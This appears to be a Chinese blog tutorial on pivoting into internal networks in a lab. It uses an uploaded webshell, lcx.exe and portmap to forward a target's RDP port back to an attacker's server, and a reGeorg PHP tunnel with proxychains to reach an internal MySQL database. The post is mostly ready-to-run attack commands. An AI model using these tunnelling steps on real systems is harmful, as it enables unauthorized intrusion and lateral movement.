单双内网隧道技术实现

这里前提环境就不再赘述,详细可以观看上文。

目标在内网,攻击者在公网,服务器是可以寻找到攻击者的。可以直接ping。

这里需要借助一个工具:portmap 

cd ~/tools/portmap/
./portmap -h

 如上图显示,则可以正常使用,否则需要更新或下载。使用方法也有说明。

 我们是等待对方发起连接,在12中选择一个。

./portmap -m 2 -p1 2333 -p2 3389

-m是使用的方法,后面则是将2333端口的流量转发到3389上,这是在本机上进行的。

接下来要将这个工具上传到目标服务器上,让流量转发到远端服务器,这里工具不上面的portmap,而是lex.exe。

由于之前已经通过上传的一句话木马,通过蚁剑连接后,可以直接上传。

 这里使用-slave

lcx.exe -slave 192.168.40.140 2333 127.0.0.1 3389

 看到连接成功。

这时候目标主机的3389端口已经与kali的2333端口相连了。

这时候我们使用远程连接,可以直接连接成功。

rdesktop 127.0.0.1

左边是连接产生的流量。

 直接连接成功。 

公网服务器命令

lcx.exe -listen 2333 33891
或
./portmap -m 2 -p1 2333 -p2 33891

 目标服务器命令

lcx.exe -slave 【公网服务器IP】 2333 127.0.0.1 3389

远程桌面链接

rdesktop 127.0.0.1:33891

 缺点

● 流量是否加密 
● 需要公网服务器 
● 无法访问其他端口

双内网

这里需要将网关的一块网卡修改成桥接,来模仿双内网,此时kali和服务器均处于内网模式。

 此时不难发现,通过蚁剑来连接服务器来获得的IP跟kali的ip对比,发现两台机器均在内网。

此时,要想办法连接3389端口。但因为都是在内网,无法连接,可以尝试ping一下

 (这里修改了一下IP地址,同时网关上的远程访问的NAT需要修改)无法ping通。

访问一下网关的外网IP

 由于之前做了网关做了转发,可以通过外网IP来访问网站。

 kali下的regeorg有两个文件一个是tunnel.nosocket.php、另一个是.py文件。将.php文件上传。

上传成功之后访问一下

“ 看起来一切正常”  隧道出口建立成功。

 执行python脚本监听8888端口

python2 reGeorgSocksProxy.py -u "http://10.9.67.73/DVWA-master/hackable/uploads/tunnel.nosocket.php" -p 8888

尝试连接Mysql数据库

 修改文件

sudo vim /etc/proxychains4.conf

拉至最下方修改。 

 

 

 看到成功连接数据库

proxychains4 mysql -h 127.0.0.1 -uroot -proot

本文仅提供文学探讨

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值